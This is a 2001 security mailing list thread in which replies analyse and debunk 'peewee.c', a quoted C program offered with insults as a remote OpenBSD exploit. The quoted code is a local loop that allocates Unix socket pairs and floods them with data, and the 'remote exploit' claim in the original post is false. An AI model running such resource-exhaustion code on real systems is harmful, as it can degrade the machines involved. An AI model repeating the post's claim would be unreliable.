Vulnerability Development mailing list archives
Re: proof of exploited code
From: Brad Doctor <bdoctor () ps-ax com>
Date: Wed, 06 Jun 2001 21:16:34 -0600
Unless this is part of something larger, it's current form is entirely bogus. _UNIX is a UNIX domain socket. There is no "remote" exploit here. I think the individual is upset about something. Nothing like publicly making an .. well, you know. "man socket" and search for AF_UNIX if you are curious.
-brad At 02:03 PM 6/6/2001 -0400, max wrote:
The code doesnt do anything. I ran it on an obsd 2.8 machine and the state of the machine after execution was same as before. From what i understand from this code, it simply opens up a 2 local (PF_UNIX) sockets, and writes some garbage to both of them. socket option calls change recieve and send buffers on the socket, which i guess has something to do with the size of the garbage we send to the local sockets. fcntl call sets non block flag on the sockets (im not sure i understand what this is, and the man pages are rather concise on this, but i guess it makes it a non-block device?), and then two write calls, where the crap gets written into sockets. now, i am by no means an expert or even an experienced programmer, and this analysis is my attempt to understand unix programming better, so please, all flames are welcome. im posting this just to see if my assumtions are correct, not to actually give a guru-level analysis. (so if this isnt posted, i'll live) thanks for letting me waste everyone's time : ) max > > Fsck Theo Dumbraadt wrote: > > > > This code shows a remote exploit for opensbsd versions 2.8 and 2.9 > > > > and can now be released to the public to break theo's 4 years without > > > > remote exploits sayings. I wrote it while people told me it could not > > > > happen on the list so here is your proofs bitch. > > > > // > > > > // peewee.c > > > > // peewee herman prove of consept this code will show all of the > > > > // world how vulnirable OpenBSD is and how Theo Dumbraadt is > > > > // not more than a liar copyraadt 2001 by Jigglypuff > > > > // http://home.online.no/~wiighome/ninasiden/Jigglypuff.jpg > > > > // this proggie is GPL licensed to those who use it keep my > > > > // credits and not be a lamer > > > > // > > > > #include <unistd.h> > > > > #include <sys/socket.h> > > > > #include <fcntl.h> > > > > #define BUFFERSIZE 409600 > > > > extern int > > > > main(void) > > > > { > > > > int p[2], i; > > > > char crap[BUFFERSIZE]; > > > > while (1) > > > > { > > > > if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) > > > > break; > > > > i = BUFFERSIZE; > > > > setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); > > > > setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); > > > > setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); > > > > setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); > > > > fcntl(p[0], F_SETFL, O_NONBLOCK); > > > > fcntl(p[1], F_SETFL, O_NONBLOCK); > > > > write(p[0], crap, BUFFERSIZE); > > > > write(p[1], crap, BUFFERSIZE); > > > > } > > > > return(0); > > > > } > > > > * Get your free email at http://www.inbox.net >
Current thread:
- proof of exploited code Fsck Theo Dumbraadt (Jun 06)
- Re: proof of exploited code Blue Boar (Jun 06)
- Re: proof of exploited code max (Jun 06)
- Re: proof of exploited code Brad Doctor (Jun 06)
- Re: proof of exploited code Dimitry Andric (Jun 06)
- Re: proof of exploited code max (Jun 06)
- Re: proof of exploited code Adam Langley (Jun 06)
- Re: proof of exploited code Filip Maertens (Jun 06)
- Re: proof of exploited code Blue Boar (Jun 06)